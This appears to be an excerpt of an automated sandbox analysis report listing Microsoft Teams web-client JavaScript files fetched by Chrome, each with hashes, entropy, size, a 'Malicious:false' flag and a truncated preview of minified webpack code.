                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[441408],{526468:(e,n,t)=>{var i;t.d(n,{Jy:()=>i,IQ:()=>a,Wm:()=>r,Oi:()=>s}),function(e){e.Minimal="Minimal",e.Chat="Chat",e.CommentStream="CommentStream",e.MeetingDetails="MeetingDetails",e.ShareToTeams="ShareToTeams",e.VirtualEvents="VirtualEvents",e.StatusNote="StatusNote"}(i||(i={}));const a={mention:["aria-label","mri","type","itemscope"],link:["href","data-itemprops","itemtype","rel","title","target","itemid","data-processed-url"]},r={link:["href","rel","title","target"]},s={emoticon:"http://schema.skype.com/Emoji",mention:"http://schema.skype.com/Mention",topic:"http://schema.skype.com/Topic",giphy:"http://schema.skype.com/Giphy",sticker:"http://schema.skype.com/Sticker",cachedImage:"http://schema.skype.com/CachedImage",amsImage:"http://schema.skype.com/AMSImage"}},651482:(e,n,t)=>{t.d(n,{O:()=>i,uS:()=>a,pP:()=>r,V7:()=>s,kF:()=>o});const i={inviteOffNetworkContacts:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14632)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):14740
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4039958808547786
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:7yxZGphPpPVHt9xq+JrcVQ2H+dh6R02te8zXP26T8t2cO8T5m0fN6mdD57h+OR0R:7yxZGnP3t9xqCr+Q76RRN/2Zt2c7gmsr
                                                                                                                                                                                                                                                                            MD5:4020AC6F830FB33A2B29E89DB059B4C0
                                                                                                                                                                                                                                                                            SHA1:2AE741E32C09DD84BCBA604C82393B3362C6E32C
                                                                                                                                                                                                                                                                            SHA-256:F4847442D93F5B9D87C8D54F46E957A0E59AEC8A0E88181767E8894A96BC6F2B
                                                                                                                                                                                                                                                                            SHA-512:36903165D20453C280C7E51667818806F8EF7A8CD326148CD8B1F8F1DDC79A802CC0B66FE9553015AA2E606D5E09017DA5367161D9D182548C70A6E84DCF4F16
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[574626],{690784:(t,r,e)=>{var o=e(212218)(e(587809),"DataView");t.exports=o},180345:(t,r,e)=>{var o=e(807732),n=e(968386),a=e(2909),s=e(458865),i=e(87225);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},796779:(t,r,e)=>{var o=e(189546),n=e(398316),a=e(902719),s=e(631683),i=e(577051);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},342587:(t,r,e)=>{var o=e(212218)(e(587809),"Map");t.exports=o},525801:(t,r,e)=>{var o=e(678436),n=e(603154),a=e(687181),s=e(328929),i=e(247241);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2226)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2334
                                                                                                                                                                                                                                                                            Entropy (8bit):4.825945121544423
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3LiouLAZn3gaUA+YAu+cagHolf3FWNBpjFgasYAu+cagHonRe9:kTkQA+YBagIV04YBagIY
                                                                                                                                                                                                                                                                            MD5:BA38CEE8C377859BE1F9CE537CDFBA60
                                                                                                                                                                                                                                                                            SHA1:6DECCD6607F0B7FEC7BBC5B7152ECE6EB098F927
                                                                                                                                                                                                                                                                            SHA-256:F9E2FC19A87459D0C955BBAA4F301B54BD93D8E868B5119097C2A24E336EE203
                                                                                                                                                                                                                                                                            SHA-512:29D5CE2205845148C5AB04E483B61576CD695E700BEBBE35AE46C26C435C824303DBAE9C6594ABFD99F884E10F292F0D931E09CCED846DD98DE8BD28408B875A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[295416],{295416:(C,e,s)=>{s.d(e,{w:()=>i});var L=s(957032),a=s(395225),t=s.n(a),l=s(485529),c=s(829289);const i=(0,l.Ke)({svg:({classes:C})=>(0,L.Y)("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:t()(C.svg),children:[(0,L.Y)("path",{className:t()(c.Q.outline,C.outlinePart),d:"M8.5 10C9.32843 10 10 10.6716 10 11.5V12C10 13.9714 8.14049 16 5 16C1.85951 16 0 13.9714 0 12V11.5C0 10.6716 0.671573 10 1.5 10H8.5ZM8.5 11H1.5C1.22386 11 1 11.2239 1 11.5V12C1 13.4376 2.43216 15 5 15C7.56784 15 9 13.4376 9 12V11.5C9 11.2239 8.77614 11 8.5 11ZM5 3.5C6.51878 3.5 7.75 4.73122 7.75 6.25C7.75 7.76878 6.51878 9 5 9C3.48122 9 2.25 7.76878 2.25 6.25C2.25 4.73122 3.48122 3.5 5 3.5ZM14 0C15.0544 0 15.9182 0.815878 15.9945 1.85074L16 2V4C16 5.05436 15.1841 5.91817 14.1493 5.99451L14 6H12.499L11.301 7.59979C10.7716 8.30599 9.69652 8.01993 9.52431 7.22426L9.50656 7.11264L
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15842)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15950
                                                                                                                                                                                                                                                                            Entropy (8bit):5.401055303230981
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:UD09xNypTbzbWXu9mEC1ND4z6Dl0cyj2YaCLChb2B6ztY1CD105CfqH:UD0Xk5viXu9m7jD4GucW2YJWp2B6zS1Z
                                                                                                                                                                                                                                                                            MD5:229EED66C6AC955B9F35684305A2C295
                                                                                                                                                                                                                                                                            SHA1:5C74966096AF404353499E2E2865F08A48000BB4
                                                                                                                                                                                                                                                                            SHA-256:4877E43F2D17AC47934D283BD4E7797854C02BD29CF66172962740D9EEB14544
                                                                                                                                                                                                                                                                            SHA-512:BEA37B2D2754FA815E90C7F5002F3CFB7F7CDD9266E1AEBDE1501EEC07944DF379D1070B70A9EAB3E1215604CBD97752DCE0FF3CF41998435FD21C451521669E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[921389],{111386:(e,t,n)=>{n.d(t,{xY:()=>r,Yb:()=>o});const r=e=>"object"==typeof e&&"string"==typeof e?.name&&"object"==typeof e?.fluid,o=e=>{const t=e;return"object"==typeof t&&("string"==typeof t?.package||r(t?.package))&&(void 0===t?.config||"object"==typeof t?.config)}},894082:(e,t,n)=>{n.d(t,{Qs:()=>i,uF:()=>s,hj:()=>a,kL:()=>d,Aj:()=>u});var r=n(747430);const o="fluidOdspDriverManifestCache_";function i(e){const t=(0,r.Ar)()?.getItem(c(e));if(!t)return null;return JSON.parse(t)}function s(e,t){if(!(0,r.Ar)())return;const n={...e,lastUpdatedTime:Date.now()};(0,r.Ar)()?.setItem(c(t),JSON.stringify(n))}function a(){return!!(0,r.Ar)()}function c(e){return o+(e||"Prod")}function d(e){const t=(0,r.Ar)()?.getItem(l(e));return t||null}function u(e,t){(0,r.Ar)()&&(0,r.Ar)()?.setItem(l(t),e)}function l(e){return c(e)+"_prefetch"}},813899:(e,t,n)=>{n.d(t,{mE:()=>b,A6:()=>y,d:()=>g
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):152852
                                                                                                                                                                                                                                                                            Entropy (8bit):4.408111707727397
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:TUIUSL0uGXPMXoFExy8aL127F3KlxBE/Xh6:aFOy8aL1aKp
                                                                                                                                                                                                                                                                            MD5:20AC22EBF3982B42211519B0C3829439
                                                                                                                                                                                                                                                                            SHA1:DE630EF84A805FB28BFC88CA73092093E9F9D4BF
                                                                                                                                                                                                                                                                            SHA-256:CF46004FD575CA28AC17F6F4D1B02AC5BF48DA55D9F261C4564A51E4C2C21FAF
                                                                                                                                                                                                                                                                            SHA-512:B9587652B99ED4F1B873E33421A948EB598077566A6EE673E469049A8E791F0EEE379C15775AE29F327B3EE12B63C1381E5CC18A5D979851BC1636B9B4279F07
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/355005-7a1c934ed84f1ff3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[355005],{169233:(a,l,Z)=>{Z.d(l,{ZtX:()=>c,vXm:()=>e,on3:()=>m,m61:()=>v,Yfv:()=>M,wbC:()=>A,l1P:()=>H,dcr:()=>V,$Vp:()=>r,tX_:()=>i,K4k:()=>U,gNM:()=>d,C$A:()=>L,QUO:()=>t,FV:()=>u,Jkc:()=>R,qw7:()=>o,eAs:()=>C,Co4:()=>g,ETz:()=>n,xyh:()=>F,BjN:()=>s,f9S:()=>p,Rl_:()=>w,tXH:()=>T,JAW:()=>f,dIR:()=>S,XST:()=>b,lOY:()=>k,Tu1:()=>B,mho:()=>x,g0A:()=>I,PCP:()=>D,hyw:()=>y,qTc:()=>E,cUx:()=>q,ryW:()=>O,lkJ:()=>P,cDX:()=>z,M5p:()=>_,__C:()=>W,muQ:()=>Q,SEp:()=>X,Yx5:()=>$,IEM:()=>G,SZX:()=>N,abA:()=>Y,mdF:()=>J,_tw:()=>K,a1m:()=>j,LI8:()=>aa,Tp5:()=>la,fXC:()=>Za,ZRs:()=>ha,nQe:()=>ca,l_X:()=>ea,SGl:()=>ma,MZl:()=>va,up$:()=>Ma,IM1:()=>Aa,iju:()=>Ha,uEE:()=>Va,a2s:()=>ra,Yi9:()=>ia,iBC:()=>Ua,GN6:()=>da,UEN:()=>La,Tdu:()=>ta,Rvv:()=>ua,Sub:()=>Ra,qqS:()=>oa,ZJF:()=>Ca,nn9:()=>ga,W9G:()=>na,Um6:()=>Fa,oYc:()=>sa,O35:()=>pa,PDr:()=>wa,P0w:()=>Ta,r$t:()=>fa,JdG:()=>Sa,xKI:()=>ba,rCW:
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33000)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33108
                                                                                                                                                                                                                                                                            Entropy (8bit):5.412771564965738
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:t3njFfVkZBauR0Rke9v54B+jjkasi6juRYb0AKnOU1ovzywyu3CMMRtw2L6HNPjE:28uR0RkeMjuRYb0AKnOU1ovzywyptw2b
                                                                                                                                                                                                                                                                            MD5:151E852AC972E6EB3FF7F799813CACFE
                                                                                                                                                                                                                                                                            SHA1:730FE4CC00AF6B36026AFC895C0055EB2FC20F98
                                                                                                                                                                                                                                                                            SHA-256:E066550039057E9E563F40FA2D1856088F49274A34E586565D56A573690F1B5C
                                                                                                                                                                                                                                                                            SHA-512:2D37C4E3403E06D6062E9783C9A2AEDE3F106ECFD6192F23F1F4AF05C17F51767838A1D894BD7E7D1261D52A2B339B0D1A288CE1978D280A2BB67F6D0EE557C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/669152-07edb61a22aacff3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[669152],{380015:(r,e,o)=>{o.d(e,{h:()=>l,m:()=>u});var a=o(594900),t=o(649380),d=o(197609);const n=t.TQ.reduce(((r,e)=>{const o=e.slice(0,1).toUpperCase()+e.slice(1),t={[`colorPalette${o}Background1`]:a.yd[e].shade40,[`colorPalette${o}Background2`]:a.yd[e].shade30,[`colorPalette${o}Background3`]:a.yd[e].primary,[`colorPalette${o}Foreground1`]:a.yd[e].tint30,[`colorPalette${o}Foreground2`]:a.yd[e].tint40,[`colorPalette${o}Foreground3`]:a.yd[e].tint20,[`colorPalette${o}BorderActive`]:a.yd[e].tint30,[`colorPalette${o}Border1`]:a.yd[e].primary,[`colorPalette${o}Border2`]:a.yd[e].tint20};return Object.assign(r,t)}),{});n.colorPaletteRedForeground3=a.yd.red.tint30,n.colorPaletteRedBorder2=a.yd.red.tint30,n.colorPaletteGreenForeground3=a.yd.green.tint40,n.colorPaletteGreenBorder2=a.yd.green.tint40,n.colorPaletteDarkOrangeForeground3=a.yd.darkOrange.tint30,n.colorPaletteDarkOrangeBor
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (40220)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):40327
                                                                                                                                                                                                                                                                            Entropy (8bit):4.982499934637003
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:fnQ8wUfUOoo9OiHjtwTV0iwiT1UvlPBwef4Z02dW+yGPORt1PnV6gPnn4PFKMtAl:0UfUOoo9OCt9ludW+yGPOdPnn+YTB
                                                                                                                                                                                                                                                                            MD5:C60442CC6612FFEA845F214AE8F289AF
                                                                                                                                                                                                                                                                            SHA1:BC4EEC893D082F696DFE20C5131CE803B8106DC5
                                                                                                                                                                                                                                                                            SHA-256:7B2501E4EFCB6F75738A5E1B1F63E9342265E0D0A88EABA757E5C33B66ABED64
                                                                                                                                                                                                                                                                            SHA-512:0DC5D6588C04496E59F88358B65B18A7A5647D3C28CE911E3399643923B3893F74BDC2C7E9906878439390A64C59AA39537F1EE318775450A246CB4DF9471DA0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/52085-5ca564432872e7e0.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52085],{848020:(e,t,a)=>{a.d(t,{aS:()=>i,a7:()=>n,as:()=>o,Mb:()=>r,el:()=>s,Av:()=>l,nb:()=>c,Jw:()=>m,hz:()=>d,gs:()=>g,p8:()=>p,cy:()=>u,O:()=>h});const i={Anonymous:"Anonymous",Aad:"Aad",Msa:"Msa",MsaLife:"MsaLife",GFed:"GFed",Otp:"Otp"},n={Member:"Member",Anonymous:"Anonymous",Guest:"Guest"},o={Default:"Default",Mto:"Mto",Ccm:"Ccm",Eotp:"Eotp"};var r;!function(e){e[e.Member=0]="Member",e[e.Guest=1]="Guest",e[e.Anonymous=2]="Anonymous",e[e.CrossCloudMeeting=3]="CrossCloudMeeting"}(r||(r={}));const s={prod:"prod",life:"life",dod:"dod",gcch:"gcch",gallatin:"gallatin",airgap08:"airgap08",airgap09:"airgap09"};var l,c,m,d,g,p,u,h;!function(e){e.prod="Global",e.gcch="microsoftonline.us",e.dod="microsoftonline.mil",e.gallatin="partner.microsoftonline.cn",e.gcc="gcc.microsoftonline.com",e.ag08="eaglex.ic.gov",e.ag09="microsoft.scloud"}(l||(l={})),function(e){e.prod="login.microso
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):129495
                                                                                                                                                                                                                                                                            Entropy (8bit):5.264148032458579
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:nvIDpltjnNK4MKEs6iifxAmrQ76GBtBkQjyMAz8f:ngS46MBkQio
                                                                                                                                                                                                                                                                            MD5:3C93003ED2005FC512F13D8296A28B2E
                                                                                                                                                                                                                                                                            SHA1:E080952C0FCDD6DC9136537D89C57B78E38512AF
                                                                                                                                                                                                                                                                            SHA-256:3131BF1591179C74E8D2020D73EB09742CA931075C3EA7BA5AFEFC4D76400814
                                                                                                                                                                                                                                                                            SHA-512:34E6940C6D7BF5F84B614499AAD8C60744ED2F8F8496603180B2BA419D7C6849B35E8DE80D0CD5E01AD83A42D20EA378DB85FD6A6398D69CD24C6D6EC6B0868F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[638637],{323707:(e,n,t)=>{var r=t(513432),l=t(253070);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=new Set,o={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(o[e]=n,e=0;e<n.length;e++)u.add(n[e])}var c=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32122)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):32230
                                                                                                                                                                                                                                                                            Entropy (8bit):5.6201369277512105
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ky15565ygDgN3B5GZa+FAFSQ4dkSPNmsMqYF:ki556IgEkxAF94dkSFYF
                                                                                                                                                                                                                                                                            MD5:B80CABAEA6D226886E17263A4F397E36
                                                                                                                                                                                                                                                                            SHA1:200C4546B6DC10D6ED4FE82F1349F9BCF8E8DF86
                                                                                                                                                                                                                                                                            SHA-256:C7BED8477D6892E7B1D69BAD8791BB8EA5A2AA3D50D9CC0A5E9BA7F79C10BCF0
                                                                                                                                                                                                                                                                            SHA-512:5108041F064FD6C8531180295237F3E262DEB978CB1D62E4140747076BA5AA886B3660B8DA55B9AE64C0DF03A11E2FBEDDB0D75386C217180A8CA82D4BC3F9C0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/675783-dbef3b06888e56aa.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[675783],{554404:(e,n,t)=>{var i,a,o,s,E,r,S,_,T,l,I,A,c,C,R,p,N,m,d,u,L;t.d(n,{qv:()=>i,SY:()=>a,Kt:()=>o,VA:()=>E,lM:()=>r,Pr:()=>S,Kv:()=>_,To:()=>T,PY:()=>l,bh:()=>I,D2:()=>A,np:()=>C,zD:()=>R,pU:()=>p,s4:()=>N,d8:()=>m,Cu:()=>d,wy:()=>u}),function(e){e.Work="",e[e.Freemium=2]="Freemium",e[e.Life=3]="Life"}(i||(i={})),function(e){e.Personal="personal",e.Channel="channel",e.Unknown="unknown"}(a||(a={})),function(e){e.GuardianChat="GuardianChat"}(o||(o={})),function(e){e[e.anonymous=0]="anonymous",e[e.default=1]="default",e[e.guest=2]="guest",e[e.msaGuest=3]="msaGuest",e[e.msaMember=4]="msaMember",e[e.otpGuest=5]="otpGuest",e[e.otpMember=6]="otpMember"}(s||(s={})),function(e){e[e.Admin=0]="Admin",e[e.Anonymous=1]="Anonymous",e[e.Guest=2]="Guest",e[e.Regular=3]="Regular"}(E||(E={})),function(e){e.x64="x64",e.ia32="ia32",e.x86="x86",e.unknown="unknown"}(r||(r={})),function(e){
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (19349)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):19469
                                                                                                                                                                                                                                                                            Entropy (8bit):5.469457610850632
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:0CH6vY11+WWdH4K481Bzy65hmGPg5f6+4UBev0DNK04476x39mFYVdACUmt5/7qQ:0CavY1v0HdBW65hc6+Fev08044s9mFqf
                                                                                                                                                                                                                                                                            MD5:7F3F015837A71A5F44DB75E3AB4CE8C2
                                                                                                                                                                                                                                                                            SHA1:2D4D1432798CCEFC1F9A1A3AA80707A7ED2296B4
                                                                                                                                                                                                                                                                            SHA-256:E13A3426474D1993F36A0AE061DE6F4BD45CB68DCC68C903DEFE7C1DD8ED8482
                                                                                                                                                                                                                                                                            SHA-512:D2B53FB9BE0DE75D5294273F5F7DC5909B585972495AE7ADB7EAEBA4B1C6AA95BDE5BE8AB05DC6C37DF25E71FC4B15285AD3A19F89274FADC853908298B9DB8A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[839569],{19493:(e,t,r)=>{var s;r.d(t,{Q:()=>s}),function(e){e[e.Missing=0]="Missing",e[e.Loading=1]="Loading",e[e.Loaded=2]="Loaded",e[e.Failed=3]="Failed"}(s||(s={}))},324011:(e,t,r)=>{r.d(t,{$n:()=>_,fj:()=>c,gI:()=>u,DU:()=>o,Co:()=>l,Xy:()=>m,lw:()=>h});const s=["aao","abh","abv","acm","acq","acw","acx","acy","adf","ads","ae","aeb","aec","afb","ajp","apc","apd","ar","arb","arc","arq","ars","ary","arz","auz","avl","ayh","ayl","ayn","ayp","bbz","bcc","bqi","ckb","dv","fa","glk","hbo","he","jpr","ku","men","mzn","nqo","pbt","pbu","peo","pes","pga","pnb","prd","prp","prs","ps","pst","sam","sd","shu","sqr","ssh","ug","ur","xaa","xmn","ydd","yhd","yi","yih","yud","pseudo_rtl"];var a=r(72393),n=r(802756);const i={af_ZA:1078,am_ET:1118,ar_AE:14337,ar_BH:15361,ar_DZ:5121,ar_EG:3073,ar_IQ:2049,ar_JO:11265,ar_KW:13313,ar_LB:12289,ar_LY:4097,ar_MA:6145,ar_OM:8193,ar_QA:16385,ar_SA:10
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):957066
                                                                                                                                                                                                                                                                            Entropy (8bit):5.324141683516416
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:qkZVWaypSiX3eba6vZ/0rf8swf27hKeP0Ch9:qCVWaypSyeba6B/0rf8twhKeNh9
                                                                                                                                                                                                                                                                            MD5:032B7E80C825970D762F0930D0321D9A
                                                                                                                                                                                                                                                                            SHA1:29E5CF7A7A31E6CB32DE8E2EDC6879188F958CE8
                                                                                                                                                                                                                                                                            SHA-256:EB63B170FA18F615753E14C6925CE067A2B3D28118E42CA523785F4D21F9BFFB
                                                                                                                                                                                                                                                                            SHA-512:41CEDA890C55A373FDB82F8572FA638985BC7E21057F9292F24EA7FF6FE4AECCAC821969046F3B1067FAB3B1D74443614D660835913CC66E58A1FD56A72EDBED
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[268910],{669130:(e,r,o)=>{o.d(r,{b:()=>n});var i=o(152608);const t={bodyFontFamily:"-apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Web', sans-serif",codeFontFamily:"'Cascadia Mono', Consolas, ui-monospace, Menlo, Monaco, monospace",colors:o(634855).j,colorScheme:{brand:{background4:"#464775"}}},n={siteVariables:{...i.k.siteVariables,...t}}},388136:(e,r,o)=>{o.d(r,{$:()=>w});var i=o(152608),t=o(954057);const n={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{statusNote:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Alert","root");return{...o&&{backgroundColor:n.background4},...i&&a(i,e)}}},a={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{isRosterHeaderMoreMenuButton:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Button","root");return{...o&&{backgroundColor:n.background2},...i&&a(i,e)}}},d={root:e=>{cons
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (652)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):765
                                                                                                                                                                                                                                                                            Entropy (8bit):5.403587201614664
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12:/4p3sp38VFlHKVqZhZbZ9XVPBnMzHoFsnbFIJFse+mMcQZgDhsDzrhV2zLWEZJgJ:wp3sp38fNVj179BnMDwyKJFse+mMcQ5j
                                                                                                                                                                                                                                                                            MD5:54D48CA40676CE5F69A75299285057CB
                                                                                                                                                                                                                                                                            SHA1:A966259EFE700E5AC0CDDE0011BCAFB996E7AFF7
                                                                                                                                                                                                                                                                            SHA-256:AA84EC5E9B9AE3037FC966D7B72208A6CD18649BBA5F74595724176370025EC1
                                                                                                                                                                                                                                                                            SHA-512:70212CD3140E22187EE307F37EAC0A069848243762C86FB76747AF532035B299250C7A32E2B7CAF5648009DFD5991F73B52118218B6AF23A618767C291875E9C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[893369],{168570:(e,a,r)=>{r.r(a),r.d(a,{ClientSchema:()=>s,Schema:()=>n,ServerSchema:()=>t,resolvers:()=>i.u,typeDefs:()=>c});var t={};r.r(t);var s={};r.r(s);var n={};r.r(n);var c=r(876152),i=r(701426)},701426:(e,a,r)=>{r.d(a,{u:()=>n});var t=r(425104),s=r(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new t.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.map
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):160948
                                                                                                                                                                                                                                                                            Entropy (8bit):5.071433125556775
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:F9QCxgfp55cC4AQzZbQibIxUkHaVfNdkNEmmhDm:F9QZfpjcC4AQzZbQVraVfNdEEzDm
                                                                                                                                                                                                                                                                            MD5:37DF22CD4160A09C6A1DFF9EEA2D4889
                                                                                                                                                                                                                                                                            SHA1:820356DBD6D04AE45769478A02C9351E9450ACBD
                                                                                                                                                                                                                                                                            SHA-256:79E4C57BDCC297E7D28C1E3AFDD63DF5131E6C7BE1DA16AD10951D41E59ED9B1
                                                                                                                                                                                                                                                                            SHA-512:2FF73CFB22554586D29970AE9C1EAFC285AF5CDCFD3D8E2B4DDADD7BD671D52A527B26D64D7EA31C2AC1C2E1B8284664561021B153EFA7F25396ACABF925A5B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/876152-9e1f173033894cb0.js
